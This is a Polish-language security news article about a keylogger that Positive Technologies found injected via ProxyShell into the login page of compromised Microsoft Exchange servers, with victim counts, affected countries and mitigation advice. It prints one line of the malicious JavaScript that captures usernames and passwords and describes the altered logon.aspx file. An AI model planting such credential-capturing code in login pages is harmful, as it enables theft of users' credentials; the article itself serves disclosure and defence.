Keylogger kradnący dane logowania w Microsoft Exchange Server

W dzisiejszym poście opiszemy ciekawy, nowo odkryty keylogger, który kradnie dane uwierzytelniające użytkowników ze strony logowania do poczty Microsoft Exchange.

Autor: Kapitan Hack Data dodania: 22 maj 2024 08:00 3 min czytania

Wyrafinowany keylogger odkryli eksperci z Security Center (PT ESC) w Positive Technologies podczas badania incydentu związanego z zaatakowanym serwerem Microsoft Exchange. Był on ukryty na stronie głównej serwera, służącej logowaniu do poczty. Problem stanowi poważne naruszenie bezpieczeństwa, wpływające na firmy i organy rządowe na całym świecie.

Szczegóły dotyczące keyloggera na Exchange

Szkodliwy kod został wykryty w funkcji clkLgn() strony głównej serwera.

Keylogger rejestruje dane uwierzytelniające, takie jak nazwy użytkowników i hasła, i przechowuje je w pliku, do którego można uzyskać dostęp za pośrednictwem określonej ścieżki internetowej. W ataku wykorzystano lukę ProxyShell – dobrze udokumentowany błąd w zabezpieczeniach serwerów Microsoft Exchange. Atakujący, wykorzystując ją, mogli wstrzyknąć kod keyloggera na stronę główną serwera.

Hakerzy wykorzystali następujący fragment kodu:

var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Ponadto osoby atakujące zmodyfikowały plik „logon.aspx” w celu przetworzenia uzyskanych danych uwierzytelniających i przekierowania ich do pliku dostępnego przez Internet. Umożliwiło im to uzyskanie i wydobycie poufnych danych logowania w sposób niezauważony.

Kod zainfekowanego pliku „logon.aspx”. Źródło: Positive Technologies.

Dochodzenie wykazało, że atak dotknął ponad 30 ofiar, z których większość stanowiły agencje rządowe. Wśród dotkniętych podmiotów znajdują się instytucje edukacyjne, korporacje i firmy informatyczne.

Ataki dotknęły różne kraje w Afryce i na Bliskim Wschodzie, takie jak Rosja, Zjednoczone Emiraty Arabskie, Kuwejt, Oman, Niger, Nigeria, Etiopia, Mauritius, Jordania i Liban.

Jak chronić się przed tego typu atakiem?

Positive Technologies powiadomiła wszystkie organizacje, których dotyczy problem, i zaleciła ograniczenie zagrożenia. Firmom korzystającym z serwerów Microsoft Exchange zaleca się:

Sprawdzenie, czy serwer Exchange nie został skompromitowany – wyszukaj kod keyloggera na stronie głównej serwera Microsoft Exchange.
Załatanie luk w zabezpieczeniach – upewnij się, że wszystkie znane luki, w tym ProxyShell, są niezwłocznie załatane.
Monitorowanie dzienników logów – regularnie monitoruj dzienniki serwera pod kątem nietypowej aktywności i prób nieautoryzowanego dostępu.
Zwiększenie środków bezpieczeństwa – wdróż uwierzytelnianie wieloskładnikowe i inne zaawansowane środki bezpieczeństwa w celu ochrony przed kradzieżą danych uwierzytelniających.

Opisany incydent podkreśla kluczowe znaczenie utrzymywania solidnych zabezpieczeń cybernetycznych i zachowania czujności wobec zmieniających się zagrożeń.

Ponieważ przestępcy w dalszym ciągu wykorzystują luki w powszechnie używanym oprogramowaniu, organizacje muszą nadać priorytet proaktywnym środkom bezpieczeństwa, aby chronić swoje wrażliwe informacje.